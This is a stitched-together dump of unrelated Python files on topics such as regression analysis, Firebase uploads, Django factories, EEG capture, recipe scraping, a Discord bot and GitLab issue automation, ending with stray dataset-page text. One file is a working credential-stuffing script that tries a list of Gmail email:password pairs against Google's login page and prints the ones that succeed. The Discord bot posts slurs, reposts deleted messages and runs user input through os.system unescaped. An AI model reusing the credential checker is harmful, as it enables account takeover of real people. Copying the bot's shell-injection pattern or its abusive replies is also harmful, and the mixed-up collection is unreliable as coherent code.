data = pd.read_csv("./regressionData(2019).csv", na_values=[999])
df = pd.DataFrame(data, columns = ['학업스트레스', '가족스트레스', '우울', '스마트폰중독']) # 상관 분석을 하고자 하는 컬럼 선택
df = df.dropna() # 결측치 column 제거
x = df["학업스트레스"]
y = df["스마트폰중독"]
# plt.plot(x, y, 'o')
# plt.show()
#Linear Regression 분석
xCon = sm.add_constant(x)
model = sm.OLS(y, xCon)
result = model.fit()
resultSummary = result.summary()
print(resultSummary)
line_fitter = LinearRegression()
line_fitter.fit(x.values.reshape(-1,1), y) #다중회귀분석을 위한 변환
newStress = 3.12
newStudents = line_fitter.predict([[3]])
print('학업stress가', newStress, '점일때, 20학번 신입생의 1년 후 스마트폰중독 수준 예측:', newStudents)
# regCoef = line_fitter.coef_
# regInter = line_fitter.intercept_
# modelFit = line_fitter.score
# print(regCoef)
# print(regInter)
# print(modelFit)
plt.plot(x, y, 'o')
plt.plot(x, line_fitter.predict(x.values.reshape(-1,1)))
plt.show()
|
import os
import pandas as pd
from openpyxl import load_workbook
name = input("Enter your name - ")
df = pd.DataFrame({'Name' : [name]})
writer = pd.ExcelWriter('new.xlsx', engine='openpyxl')
writer.book = load_workbook('new.xlsx')
writer.sheets = dict((ws.title, ws) for ws in writer.book.worksheets)
reader = pd.read_excel('new.xlsx')
df.to_excel(writer, index=False, header=False, startrow=len(reader)+1)
writer.close()
firebase = pyrebase.initialize_app(config)
storage = firebase.storage()
path_on_cloud = "data/demo.xlsx"
path_local="new.xlsx";
storage.child(path_on_cloud).put(path_local)
#d = os.getcwd()
#os.chdir(d)
#storage.child(path_on_cloud).download("new.xlsx")
os.remove("new.xlsx")
firebase = pyrebase.initialize_app(config)
storage = firebase.storage()
path_on_cloud = "data/demo.xlsx"
#path_local=r'D:\lol\demo.xlsx';
#storage.child(path_on_cloud).put(path_local)
#d = os.getcwd
#os.chdir(d)
storage.child(path_on_cloud).download("lol.xlsx")
|
# -*- coding: utf-8 -*-
import factory
from factory.django import DjangoModelFactory
from ralph.accounts.tests.factories import UserFactory
from ralph.operations.models import (
Change,
Failure,
Incident,
Operation,
OperationStatus,
OperationType,
Problem
)
def get_operation_type(name):
return OperationType.objects.get(name=name)
def get_operation_status(name):
return OperationStatus.objects.get(name=name)
class OperationTypeFactory(DjangoModelFactory):
name = factory.Iterator(['Problem', 'Incident', 'Failure', 'Change'])
class Meta:
model = OperationType
django_get_or_create = ['name']
class OperationStatusFactory(DjangoModelFactory):
name = factory.Iterator(['Open', 'Closed', 'Resolved', 'In Progress'])
class Meta:
model = OperationStatus
django_get_or_create = ['name']
class OperationFactory(DjangoModelFactory):
title = factory.Sequence(lambda n: 'Operation #%d' % n)
status = factory.LazyAttribute(lambda obj: get_operation_status('Open'))
type = factory.LazyAttribute(lambda obj: get_operation_type('Change'))
assignee = factory.SubFactory(UserFactory)
class Meta:
model = Operation
class ChangeFactory(OperationFactory):
class Meta:
model = Change
class FailureFactory(OperationFactory):
type = factory.LazyAttribute(lambda obj: get_operation_type('Failure'))
class Meta:
model = Failure
class ProblemFactory(OperationFactory):
type = factory.LazyAttribute(lambda obj: get_operation_type('Problem'))
class Meta:
model = Problem
class IncidentFactory(OperationFactory):
type = factory.LazyAttribute(lambda obj: get_operation_type('Incident'))
class Meta:
model = Incident
|
import time
import winsound
from multiprocessing import Process, Event, Lock
from pyemotiv import Epoc
from pyfob import Fob
WINL = 300
def emotiv(e):
epoc = Epoc()
fid = open('emotiv.dat', 'w')
e.wait()
t0 = time.time()
tp = time.time()
while tp - t0 < WINL:
tp = time.time()
data = epoc.get_raw()
m, n = data.shape
for i in range(n):
fid.write(
"%8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f\n" % tuple(
data[:, i]))
fid.close()
print 'Emotiv stop...'
def ascension(e):
fob = Fob()
fid = open('fob.dat', 'w')
e.set()
t0 = time.time()
tp = time.time()
while time.time() - t0 < WINL:
ti = time.time()
if ti - tp >= (0.0075):
tp = time.time()
x, y, z, roll, pitch, yaw = fob.get_posang()
fid.write("%8.3f %8.3f %8.3f %8.3f %8.3f %8.3f %8.3f\n" % (tp - t0, x, y, z, roll, pitch, yaw))
fid.close()
fob.close()
print 'Ascension stop...'
if __name__ == '__main__':
Freq = 2500
Dur = 2000
event = Event()
p1 = Process(target=emotiv, args=(event,))
p2 = Process(target=ascension, args=(event,))
p1.start()
p2.start()
event.wait()
idx = 0
t0 = time.time()
while time.time() - t0 < WINL:
idx += 1
print idx
winsound.Beep(Freq, Dur)
time.sleep(13)
|
import mechanize
def readFile(path):
file = open(path,'r')
content = file.read()
return content
arrayLogins = readFile('logins_gmail.txt').split('\n')
url = "https://accounts.google.com/ServiceLoginAuth"
browser = mechanize.Browser()
browser.set_handle_equiv(True)
browser.set_handle_redirect(True)
browser.set_handle_referer(True)
browser.set_handle_robots(False)
browser.open(url)
for i in range(0, len(arrayLogins)):
login = (arrayLogins[i].split(':'))[0]
pw = (arrayLogins[i].split(':'))[1]
#browser.select_form('LoginForm') #selecionar pelo nome do fomr
browser.select_form(nr=0) #prrimeiro formulario da pag se for sem nome
#preencher
browser.form['Email'] = login
browser.form['Passwd'] = pw
#submit
browser.method = "POST"
resp = browser.submit()
if resp.geturl() != "https://accounts.google.com/ServiceLoginAuth":
print "LOGIN CORRETO! ===>",login," ", pw
browser.back();
else:
print "WRONG ============>", login, " ", pw
browser.back();
|
# Given a m * n matrix of distinct numbers, return all lucky numbers
# in the matrix in any order.
#
# A lucky number is an element of the matrix such that it is the
# minimum element in its row and maximum in its column.
class Solution:
def luckyNumbers(self, matrix):
return set(min(row) for row in matrix) & \
set(max(column) for column in zip(*matrix))
if __name__ == "__main__":
testinput = [[3, 7, 8], [9, 11, 13], [15, 16, 17]]
print(Solution.luckyNumbers(Solution, testinput))
|
from datetime import datetime
# 1. "{:04d}"
now = datetime.now()
cur_year = now.year
cur_month = now.month
cur_day = now.day
date_str = "{:04d}-{:02d}-{:02d}".format(cur_year, cur_month, cur_day)
print(date_str)
# 2. "{:.2f}"
value = "{:.2f}".format(3.1415926)
print(value)
'''
[result] 3.14
'''
value = "{:+.2f}".format(-1)
print(value)
'''
[result] -1.00
'''
value = "{:x<4d}".format(5)
print(value)
'''
[result] 5xxx
'''
value = "{:,}".format(1000000)
print(value)
'''
[result] 1,000,000
'''
value = "{:.2e}".format(1000000000)
print(value)
'''
[result] 1.00e+09
'''
value = "{:10d}".format(13) # Right aligned (default, width 10)
print(value)
'''
[result] 13
'''
value = "{:<10d}".format(13) # Left aligned (width 10)
print(value)
'''
[result] 13
'''
value = "{:^10d}".format(13) # Center aligned (width 10)
print(value)
'''
[result] 13
''' |
import requests
import time
from bs4 import BeautifulSoup
from recipes.models import Recipe
class BudgetByteScraper:
"""
Scrapes recipe data from budgetbytes.com and loads it into app database
"""
def __init__(self):
self.recipe_list = []
self.count = 0
def populate_recipe_list(self):
recipe_index = requests.get('https://www.budgetbytes.com/category/recipes/page/2/')
soup = BeautifulSoup(recipe_index.content, 'html.parser')
recipe_archives = soup.find('div', class_='archives').children
# Get all recipe links on the page and save them in list
for recipe in recipe_archives:
for a in recipe.find_all('a', href=True):
self.recipe_list.append(a['href'])
# Grab the next page if it exists
next_page_url = soup.find('a', class_='next', href=True)['href']
while(True):
next_recipe_page = requests.get(next_page_url)
inside_soup = BeautifulSoup(next_recipe_page.content, 'html.parser')
recipe_archives = inside_soup.find('div', class_='archives').children
# Get all recipe links on the page and save them in list
for recipe in recipe_archives:
for a in recipe.find_all('a', href=True):
self.recipe_list.append(a['href'])
next_page_url = inside_soup.find('a', class_='next', href=True)
if(next_page_url == None):
break
next_page_url = next_page_url['href']
self.count += 1
def export_recipe_to_app(self, recipe_url):
recipe_page =requests.get(recipe_url)
soup = BeautifulSoup(recipe_page.content, 'html.parser')
name = soup.find('h2', class_='wprm-recipe-name')
ingredients_area = soup.find('ul', class_='wprm-recipe-ingredients')
# If there is not an ingredients_area it is not a recipe
if ingredients_area == None: return
ingredients_list = []
for ingredient in ingredients_area:
ingredients_list.append(ingredient.text)
instructions_area = soup.find('ul', class_='wprm-recipe-instructions')
instructions_list = []
for instructions in instructions_area:
instructions_list.append(instructions.text)
times = soup.find_all('span', class_='wprm-recipe-time')
# If times does not have more than 2 entries it is not actually a recipe
if len(times) < 2: return
image = soup.find('img', class_='attachment-200x200')
author = soup.find('span', class_='wprm-recipe-author')
keywords = soup.find('span', class_='wprm-recipe-keyword')
# Handle case of some recipes not having keywords
if keywords == None:
keywords_django = ''
else:
keywords_django = keywords.text
# Handle case of some recipes not having an author
if author == None:
author_django = ''
else:
author_django = author.text
if 'data-lazy-src' in image:
image_url_django = image['data-lazy-src']
else:
image_url_django = None
Recipe.objects.get_or_create(
name=name.text,
ingredients=':'.join(ingredients_list),
instructions=':'.join(instructions_list),
prep_time=times[0].text,
cook_time=times[1].text,
image_url=image_url_django,
keywords=keywords_django,
author=author_django,
)
# id = 'some identifier'
# person, created = Person.objects.get_or_create(identifier=id)
# if created:
# # means you have created a new person
# else:
# # person just refers to the existing one
def scrape_em_all(self):
self.populate_recipe_list()
count = 0
for recipe in self.recipe_list:
self.export_recipe_to_app(recipe)
count = count + 1
print(count)
time.sleep(5)
print("{} Recipes imported".format(count))
# imp = BudgetByteScraper()
# imp.scrape_em_all() |
#!/usr/bin/python3
''' 0x0A-python-inheritance module '''
def is_same_class(obj, a_class):
''' Returns True if the object is exactly an instance
of the specified class; otherwise False.
'''
return type(obj) is a_class
|
import discord
from discord.ext import commands
import wolframalpha
import aiohttp, io, asyncio
import requests, json
import shutil, os
import time
import tokens
from bs4 import BeautifulSoup as soup
from urllib.request import urlopen as uReq
# globals
TOKEN = tokens.DISCORD_TOKEN
WOLFRAM_ID = tokens.WOLFRAM_TOKEN
client = commands.Bot(command_prefix="chad ")
wolframClient = wolframalpha.Client(WOLFRAM_ID)
starttime = time.perf_counter()
deleted_image_storage = []
voice_client = None
queue_list = []
copypath = "./temp/bot_settings_copy.json"
# remove all temp files
if os.path.isdir("./temp/"):
shutil.rmtree("temp")
os.makedirs("temp")
shutil.copy("./bot_settings.json", copypath)
def isFloat(string):
try:
float(string)
return True
except ValueError:
return False
def isInt(string):
if isFloat(string):
return float(string) == int(string)
return False
def listToString(list):
output = ""
for x in list:
output += x + " "
return output
def is_me(m):
return m.author == client.user
def getjson():
settings_file = open("./bot_settings.json", "r")
return json.load(settings_file)
def check_perms(user, level):
ourjson = getjson()["userlist"][level]
check = False
for element in ourjson:
if ourjson[element] == user:
check = True
return check
def updatejson(*args):
obj = getjson()
if args[0] == "delete":
if args[1] == "userlist":
del obj["userlist"][args[2]][args[3]]
else:
del obj["settings"][args[2]]
else:
if len(args) > 3:
obj[args[0]][args[1]][args[2]] = args[3]
else:
obj[args[0]][args[1]] = args[2]
settings_file = open("bot_settings", "w")
json.dump(obj, settings_file)
settings_file.close()
print(obj)
@client.event
async def on_ready():
print(" the bot is ready")
await client.change_presence(activity=discord.Game("in bed with Daddy Bot")
)
@client.event
async def on_message(message):
rude = False
if getjson()['settings']['rude'] == 'true':
rude = True
# respond to daddybot
if (str(message.author) == "DaddyBot#2616" and rude):
await message.channel.send("shut the fuck up daddybot")
# respond to blacklisted users
if (check_perms(str(message.author), "blacklist")
and message.content[:4] == "chad"):
await message.channel.send("shut the fuck up faggot")
# respond to people trying to use the bot when rude
if (not check_perms(str(message.author), 'admins') and rude
and message.content[:4] == "chad"):
await message.channel.send("shut the fuck up faggot")
return
try:
mystr = str(message.attachments[0])
print(mystr)
myurl = mystr[mystr.find("https"):-1]
deleted_image_storage.append(str(message.author) + " " + myurl)
file = requests.get(myurl)
open("./temp/testfile.png", "wb").write(file.content)
except:
pass
if check_perms(str(message.author), "blacklist"):
return
await client.process_commands(message)
@client.event
async def on_message_delete(message):
if check_perms(message.author, 'admins'):
return
await message.channel.send(
f"{message.author} deleted a message: {message.content}")
@client.command()
async def ping(ctx):
await ctx.send(f" {round(client.latency * 1000)} ms")
@client.command()
async def clear(ctx, amount, arg="quiet"):
if not check_perms(str(ctx.author), "admins"):
await ctx.send("shut up retard")
return
await ctx.channel.purge(limit=int(amount) + 1)
if arg != "quiet":
await ctx.send(f"deleted {amount} messages")
@client.command()
async def wolfram(ctx, *args):
try:
message = ""
for x in args:
message += x
message += " "
res = wolframClient.query(message)
answer = next(res.results).text
await ctx.send(answer)
except:
await ctx.send("Wolfram failed to find an answer")
@client.command()
async def wolframimage(ctx, *args):
url = f"http://api.wolframalpha.com/v1/simple?appid={WOLFRAM_ID}&i="
for x in args:
url += x + "+"
url = url[:len(url) - 1]
url += "%3F" # url is now ready
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
if resp.status != 200:
return await ctx.send("Could not download file...")
data = io.BytesIO(await resp.read())
await ctx.send(file=discord.File(data, "cool_image.png"))
@client.command()
async def say(ctx, *args):
await ctx.send(listToString(args))
@client.command()
async def status(ctx, *, args):
if not check_perms(str(ctx.author), "admins"):
await ctx.send("shut up retard")
return
await client.change_presence(activity=discord.Game(args))
await ctx.send(f"status changed to {args}")
@client.command()
async def translate(ctx, *, args):
alphabet = " abcdefghijklmnopqrstuvwxyz"
betterAlphabet = [
" ",
"ᔑ",
"ʖ",
"ᓵ",
"↸",
"ᒷ",
"⎓",
"⊣",
"⍑",
"╎",
"⋮",
"ꖌ",
"ꖎ",
"ᒲ",
"リ",
"𝙹",
"!",
"¡",
"ᑑ",
"∷",
"ᓭ",
"ℸ",
"̣",
"⚍",
"⍊",
"∴",
"'",
]
newStr = ""
for i in args:
if alphabet.find(args[0]) != -1:
place = alphabet.find(i)
newStr += betterAlphabet[place]
else:
place = betterAlphabet.index(i)
newStr += alphabet[place]
await ctx.send(newStr)
@client.command()
async def spam(ctx, *args):
try:
for i in range(int(args[-1])):
await ctx.send(listToString(args[:-1]))
except:
await ctx.send("enter a number retard")
@client.command()
async def clearspace(ctx, *, args):
newStr = ""
for i in args:
newStr += i if i != " " else ""
await ctx.send(newStr)
@client.command()
async def kill(ctx):
if str(ctx.author) != "asiank0ala#8008":
await ctx.send("shut the fuck up faggot")
else:
await ctx.send(":cry:")
exit()
@client.command()
async def sonic(ctx):
await ctx.send(
"https://cdn.discordapp.com/attachments/619660668580266005/712416983437803592/sonic_movie.mp4"
)
@client.command()
async def clearbot(ctx, amount):
if not check_perms(str(ctx.author), "admins"):
await ctx.send("shut up retard")
return
await ctx.channel.purge(limit=100, check=is_me)
await ctx.send(f"deleted {amount} messages")
@client.command()
async def update(ctx, *args):
if not check_perms(str(ctx.author), "admins"):
await ctx.send("shut up retard")
return
obj = getjson()
if args[0] == "delete":
if args[1] == "userlist":
del obj["userlist"][args[2]][args[3]]
else:
del obj["settings"][args[2]]
else:
if len(args) > 3:
username = ''
for k in args[3:]:
username += k
username += ' '
obj[args[0]][args[1]][args[2]] = username[:-1]
else:
obj[args[0]][args[1]] = args[2]
settings_file = open("./bot_settings.json", "w")
json.dump(obj, settings_file)
settings_file.close()
await ctx.send(obj)
@client.command()
async def getsettings(ctx):
await ctx.send(getjson())
@client.command()
async def opgg(ctx, *args):
summoner = ""
for i in args:
summoner += i + "%20"
await ctx.send("https://na.op.gg/summoner/{}".format(summoner))
@client.command()
async def join(ctx):
global voice_client
channel = ctx.author.voice.channel
voice_client = await channel.connect()
@client.command()
async def play(ctx, *, args):
global voice_client
channel = ctx.author.voice.channel
if not voice_client.is_connected():
voice_client = await channel.connect()
newargs = ""
for i in args:
if i != " ":
newargs += i
else:
newargs += "+"
print(newargs)
myurl = "https://www.youtube.com/results?search_query={}".format(newargs)
uClient = uReq(myurl)
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
results_text = page_soup.findAll("body",
{"dir": "ltr"})[0].findAll("script")[1]
code_index = str(results_text).index(r"/watch?v=") + 9
vid_code = str(results_text)[code_index:code_index + 11]
newargs = ""
for i in args:
if i != " ":
newargs += i
else:
newargs += "_"
video_url = "https://www.youtube.com/watch?v={}".format(vid_code)
os.system(
r"youtube-dl -o C:\Users\neilm\Documents\vscode\chadbot\temp\{}.%(ext)s --extract-audio --audio-format mp3 {}"
.format(newargs, video_url))
await ctx.send("video found: {}".format(video_url))
if voice_client.is_playing():
queue_list.append(newargs)
voice_client.play(discord.FFmpegPCMAudio("./temp/{}.mp3".format(newargs)))
@client.command()
async def leave(ctx):
await ctx.voice_client.disconnect()
@client.command()
async def dm(ctx, user, *, args):
target = ctx.guild.get_member_named(user)
await target.send(args)
await ctx.channel.purge(limit=1)
@client.command()
async def id_dm(ctx, id, *, args):
target = await client.fetch_user(id)
await target.send()
await ctx.channel.purge(limit=1)
@client.command()
async def uptime(ctx):
diff = time.perf_counter() - starttime # in seconds
hours = diff // 3600
minutes = diff // 60
seconds = diff - hours * 3600 - minutes * 60
await ctx.send(f"{int(hours)}:{int(minutes)}:{int(seconds)}")
@client.command()
async def getid(ctx, user):
target = ctx.guild.get_member_named(user)
await ctx.send(target.id)
@client.command()
async def test(ctx, url):
r = requests.get(url, allow_redirects=True)
open("./5Head.jpg", "wb").write(r.content)
@client.command()
async def belle(ctx):
await ctx.send("""You were thinking I died? Bitch, surprise
I still got them double-thick thighs, french fries
I get down and gobble, gobble up, with my booty up
She be going wobble wobble up, here's a big duck
Slide, slide in the peanut butter, don’t Zucc her
Who actually regrets me? My mother
I trolled betas with my Pornhub, betrayer
You nothin' but a hater hater, clout chaser
Now I watch my favorite Twitch thot, damn, she hot
What the fuck is with this mugshot? Ratatata
Elon's baby eat a Mars rock
Now I TikTok, begone, thot, begone, thot
All these simps always talkin’ shit, yada-yada-ya
When you see me, what you talking 'bout, little beansprout?
We're laughing 'cause you burnt out, got no clout
Yeah, you weak without your ass out (Yeah, yeah)
(What are you, fucking gay?)
Are you dumb, stupid, or dumb, huh?
Play me like a dummy, like, bitch, are dumb?
Are you dumb, stupid, or dumb?
Yeah, you got your money but you still freakin' ugly
XD, listen, you're not a politician
Yes, I'm a gamer, also a taxpayer
Skeet, yada, pass me Doritos
Send nudes, nani? Delphine, you nasty
Egg white, bite it, see that, get excited
Good vid, Susan, not allowed, copyrighted
You're boomer, I’m doomer, guess what? You die sooner
(Hey, that’s pretty good)
You were thinking I died? Bitch, surprise
I still got them double-thick thighs, no lies
I get down and gobble, gobble up, with my booty up
She be going wobble wobble up, here's a big duck
Slide, slide in the peanut butter, don’t Zucc her
Who actually regrets me? My mother
I trolled betas with my Pornhub, betrayer
You nothin' but a hater hater, clout chaser
You're mad I'm back? Big mad
He’s mad, she's mad, big sad
Haha, don't care, stay mad
Aha, aha, aha
Uwu, buy my OnlyFans, you big Chad
Little titties, big ass, and no dad
Bathwater sold out, big sad
OnlyFans now to get a big bag
Omae wa mō shindeiru
Nani?""")
client.run(TOKEN)
|
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
def daemon():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
d = threading.Thread(name='daemon', target=daemon)
d.setDaemon(True)
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
# To wait until a daemon thread has completed its work, use the join() method.
# By default, join() blocks indefinitely. It is also possible to pass a timeout
# argument (a float representing the number of seconds to wait for the thread
# to become inactive). If the thread does not complete within the timeout period,
# join() returns anyway.
d.join(1)
print 'd.isAlive', d.isAlive()
t.join()
"""
(daemon ) Starting
(non-daemon) Starting
(non-daemon) Exiting
d.isAlive True
"""
|
# coding: utf-8
import MeCab
f = open("../Rakuten-real-/userID150-165.csv")
li = []
for id in f:
li.append(id[:-1])
parse = MeCab.Tagger("mecabrc")
for user in range(397,400):
g = open("../rakutendb/150-165/"+li[user]+".csv")
bg = open("../rakutendb/150-165lda/"+li[user]+".csv","w")
hhh = 0
for nn in g:
if nn.find("http") > -1:
continue
hhh += 1
g.close()
bg.write(str(hhh) + "\n")
g = open("../rakutendb/150-165/"+li[user]+".csv")
for ji in g:
targ = ji.split(",")
if targ[0].find("http") > -1:
continue
f = open("../Rakuten-real-/item_review150-165/"+targ[0]+".csv")
#bg = open("../rakutendb/LDA_item_word/"+targ[0]+".csv","w")
#wr = open("../rakutendb/150-165lda/"+targ[0]+".csv","w")
rev = 0
for line in f:
result = parse.parseToNode(line)
while result:
feat = result.feature.split(",")
if (feat[6].decode("utf-8").encode("utf-8") != "*"):
bg.write(feat[6].decode("utf-8").encode("utf-8") + " ")
result = result.next
#bg.write("\n")
if rev == 100:
break
rev += 1
f.close()
#bg.close()
bg.write("\n")
|
import time
import requests
import json
from spotibot.core.objects import Time as spottime, User as user
from spotibot.core.utils import Hasher as hasher
from spotibot.mongo.utils.Handlers import get_serializable
# TODO: Need to have something here that indicates downstream actions to not
# even attempt to execute if it returns nothing/playback has gone dormant
# class Response:
#
# def __init__(self, response):
#
# self.ok: bool = response.ok
#
# self.status_code: int = response.status_code
#
# if self.ok and self.status_code == 200:
# self.result: dict = response.json()
# else:
# self.result: dict = {}
#
# def __eq__(self, other) -> bool:
# """Equality comparison to other objects.
#
# Args:
# other: Comparison object
#
# Returns:
# Boolean value indicating whether or not the attributes and their
# associated values are equal between the two objects
# """
# return vars(self) == vars(other)
#
# def __getitem__(self, item: str):
# """Getter method for subscriptability.
#
# Args:
# item: Attribute to get the value of
#
# Returns:
# Attribute value if exists in object's namespace
# """
# return getattr(self, item)
#
# def get(self, item: str, default=None):
# """Method for extracting attributes without throwing existence errors.
#
# Args:
# item: Attribute to get the value of
# default: Return value if attribute doesn't exist
#
# Returns:
# Attribute value or default if attribute does not exist
# """
# return vars(self).get(item, default)
#
# def to_dict(self) -> dict:
# """Calling utility serialization method on all attributes.
#
# Returns:
# String following valid json structure for mongo serialization.
# """
# return {k: get_serializable(v) for k, v in vars(self).items()}
#
# @property
# def json(self) -> str:
# """Jsonified/string attribute for all SpotiBot objects for mongo
# serialization purposes
#
# Returns:
# Serializable 'json' output of SpotiBot object
# """
# return json.dumps(self.to_dict())
#
#
# # class Request(user.UserDBO):
# class Request:
#
# def __init__(self, headers):
#
# self.headers = headers
#
# # --------------------------/Request Detail/---------------------------
#
# def http_get(self, href):
#
# self.unix_request_tmstmp: spottime.Timestamp = \
# spottime.Timestamp(time.time(), base='seconds')
#
# self.response = \
# Response(requests.get(href, headers=self.headers))
#
# self.endpoint_id: str = \
# hasher.quick_hash(
# f"{href}{self.unix_request_tmstmp}")
#
# return self
#
# def __eq__(self, other) -> bool:
# """Equality comparison to other objects.
#
# Args:
# other: Comparison object
#
# Returns:
# Boolean value indicating whether or not the attributes and their
# associated values are equal between the two objects
# """
# return vars(self) == vars(other)
#
# def __getitem__(self, item: str):
# """Getter method for subscriptability.
#
# Args:
# item: Attribute to get the value of
#
# Returns:
# Attribute value if exists in object's namespace
# """
# return getattr(self, item)
#
# def get(self, item: str, default=None):
# """Method for extracting attributes without throwing existence errors.
#
# Args:
# item: Attribute to get the value of
# default: Return value if attribute doesn't exist
#
# Returns:
# Attribute value or default if attribute does not exist
# """
# return vars(self).get(item, default)
#
# def to_dict(self) -> dict:
# """Calling utility serialization method on all attributes.
#
# Returns:
# String following valid json structure for mongo serialization.
# """
# return {k: get_serializable(v) for k, v in vars(self).items()}
#
# @property
# def json(self) -> str:
# """Jsonified/string attribute for all SpotiBot objects for mongo
# serialization purposes
#
# Returns:
# Serializable 'json' output of SpotiBot object
# """
# return json.dumps(self.to_dict())
|
import sys
import os
import gitlab
# TODO setup a test to make sure everything is working
# TODO add support for multi-line comments
accepted_file_types = {'.py': ['#todo', '# todo'],
'.c': ['//todo', '// todo'],
'.cpp': ['//todo', '// todo'],
'.js': ['//todo', '// todo', '// fixme', '//fixme'],
'.java': ['//todo', '// todo', '// fixme', '//fixme'],
'.php': ['//todo', '// todo', '// fixme', '//fixme'],
'.swift': ['//todo', '// todo', '// fixme', '//fixme'],
'.cs': ['//todo', '// todo'],
'.kt': ['fun todo', '//todo', '// todo'],
'.go': ['//todo', '// todo', '// fixme', '//fixme']}
class GitConnect:
def __init__(self):
self.host = "".join(["https://", os.getenv("CI_SERVER_HOST")])
self.projectPath = os.getenv("CI_PROJECT_PATH")
self.token = os.getenv("PAT")
if not self.token:
raise ValueError("Please export a private key with API and write access as PAT")
self.connection = None
self.project = None
self.setup()
self.issues = self.connection.issues.list(state='opened')
def setup(self):
self.connection = gitlab.Gitlab(self.host, self.token, api_version="4")
self.connection.auth()
self.project = self.connection.projects.get(self.projectPath)
def create_issue(self, title, description):
if self.check_issues(title, description):
issue = self.project.issues.create({'title': title, 'description': description})
issue.labels = ["TODO"]
issue.save()
def check_issues(self, title, description):
for issue in self.issues:
if issue.title == title and issue.description.startswith("Line number:") \
and issue.description[12:].split(' ', 1)[1] == description[12:].split(' ', 1)[1]:
if issue.description[12:].split(' ', 1)[0] == description[12:].split(' ', 1)[0]:
return False
else:
# Edit old issue to have new line number
editable_issue = self.project.issues.get(issue.iid, lazy=True)
editable_issue.description = description
editable_issue.save()
return False
return True
class FileToScrape:
def __init__(self, name, path):
self.path = path
self.name = name
self.lines = []
def read(self, file_type):
try:
with open(self.path, "r") as f:
for line_number, todo_line in enumerate(f):
for todo_style in accepted_file_types.get(file_type):
if todo_style in todo_line.lower():
self.lines.append("".join(["Line number:", str(line_number+1), " ", todo_line.strip()]))
except Exception as e:
print(e)
if __name__ == "__main__":
files = dict()
try:
gl = GitConnect()
except ValueError as error:
print(error)
sys.exit(1)
for root, _, files in os.walk('.', topdown=False):
for filename in files:
file_path = os.path.join(root, filename)
for accepted_file_type in accepted_file_types.keys():
if accepted_file_type in filename:
file = FileToScrape(filename, file_path)
if file.name not in sys.argv:
file.read(accepted_file_type)
for line in file.lines:
gl.create_issue(file.name, line)
print(file.name, line)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.